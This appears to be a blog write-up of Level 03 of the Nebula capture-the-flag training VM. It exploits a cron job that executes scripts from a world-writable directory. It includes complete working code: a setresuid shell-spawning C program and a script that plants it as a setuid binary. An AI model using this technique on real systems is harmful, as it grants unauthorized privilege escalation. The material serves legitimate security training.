---
layout: post
title: "Nebula Series - Level 03"
---

*Nebula is the first in a series of VMs from Exploit Exercises. It consists of 20 levels which range
in difficulty from simple to intermediate and cover topics like Linux privilege escalation and file
system race conditions.*

**Level 03**: the one where a scheduled job betrays its owner


<!--more-->

Ok, so the first thing to understand is that cron jobs, similar to setuid binaries, run as a specific user. The instructions for
this level indicate that there is a crontab that is called every couple of minutes and that we should inspect the files in `/home/flag03`
for more clues.

Taking a closer look at that directory we see

```bash
level03@nebula:/home/flag03$ ls -l
total 4
drwxrwxrwx 1 flag03 flag03  40 2020-04-10 06:27 writable.d
-rwxr--r-- 1 flag03 flag03 103 2020-04-10 06:19 writable.sh
```

There's a directory `/writable.d`, that has some pretty lax permissions, and a script that's likely
related to the scheduled job mentioned in the instructions.

```bash
level03@nebula:/home/flag03$ cat ./writable.sh
#!/bin/sh

for i in /home/flag03/writable.d/* ; do
    (ulimit -t 5; bash -x "$i")
    rm -f "$i"
done
```

Ok, so the script iterates over the files in `/writable.d`, executes them, and then deletes them.
Could we abuse this to write to a directory we otherwise wouldn't have permission to? Say... `flag03`'s home directory?

We place the following script in a file in `/writable.d` and wait for the scheduled job to run

```bash
#!/bin/bash

touch /home/flag03/test
```

After a few minutes we check the directory

```bash
level03@nebula:/home/flag03$ ls -l
total 4
-rw-rw-r-- 1 flag03 flag03   0 2020-04-10 06:39 test
drwxrwxrwx 1 flag03 flag03  40 2020-04-10 06:39 writable.d
-rwxr--r-- 1 flag03 flag03 103 2020-04-10 06:19 writable.sh
```

Sure enough, our script placed a `test` file, owned by `flag03` in their home directory. Now what?

We've already learned from previous levels that a `setuid` binary can be exploited to gain the privileges of
the user that owns it, and we just learned that we can create files as `flag03`; the plan is coming together.

Because `setuid` is ignored on interpreted executables, let's write a simple C program that changes our real uid
and runs a shell.

We'll put the following in a file called `exploit.c`

```c
#include <stdlib.h>
#include <sys/types.h>

int main(int argc, char **argv, char **envp)
{
    uid_t uid;

    uid = geteuid();

    setresuid(uid, uid, uid);

    system("/bin/bash");
}
```

And we'll compile it and save the output as `2_exploit`

```bash
$ gcc /home/level03/exploit.c -o /home/level03/2_exploit
```

Next, let's create a script called `1_exploit.sh` that, when run by the scheduled job, will copy our executable to `flag03`'s home directory
and enable `setuid`.

```bash
#!/bin/bash

cp /home/flag03/writable.d/2_exploit /home/flag03/exploit
chmod +s /home/flag03/exploit
```

We've numbered the files so that they get executed in the proper order by the cron job otherwise it might delete our binary before
it gets copied.

We copy both of those files to `/home/flag03/writable.d` and wait for the scheduled job to run.

A few minutes later we see our `exploit` binary sitting in our target's home directory waiting for us to use it. Note that it's
owned by `flag03` and is `setuid`

```bash
level03@nebula:/home/flag03$ ls -l
total 12
-rwsrwsr-x 1 flag03 flag03 7243 2020-04-10 07:15 exploit
-rw-rw-r-- 1 flag03 flag03    0 2020-04-10 06:39 test
drwxrwxrwx 1 flag03 flag03   40 2020-04-10 07:15 writable.d
-rwxr--r-- 1 flag03 flag03  103 2020-04-10 06:19 writable.sh
```

All that's left is to run our executable to get a shell as `flag03`.

```bash
level03@nebula:/home/flag03$ ./exploit
bash-4.2$ whoami
flag03
bash-4.2$ getflag
You have successfully executed getflag on a target account
```

In summary:

- each cron job runs as a specific user
- if the job executes scripts in a directory with lax access controls, it can be exploited
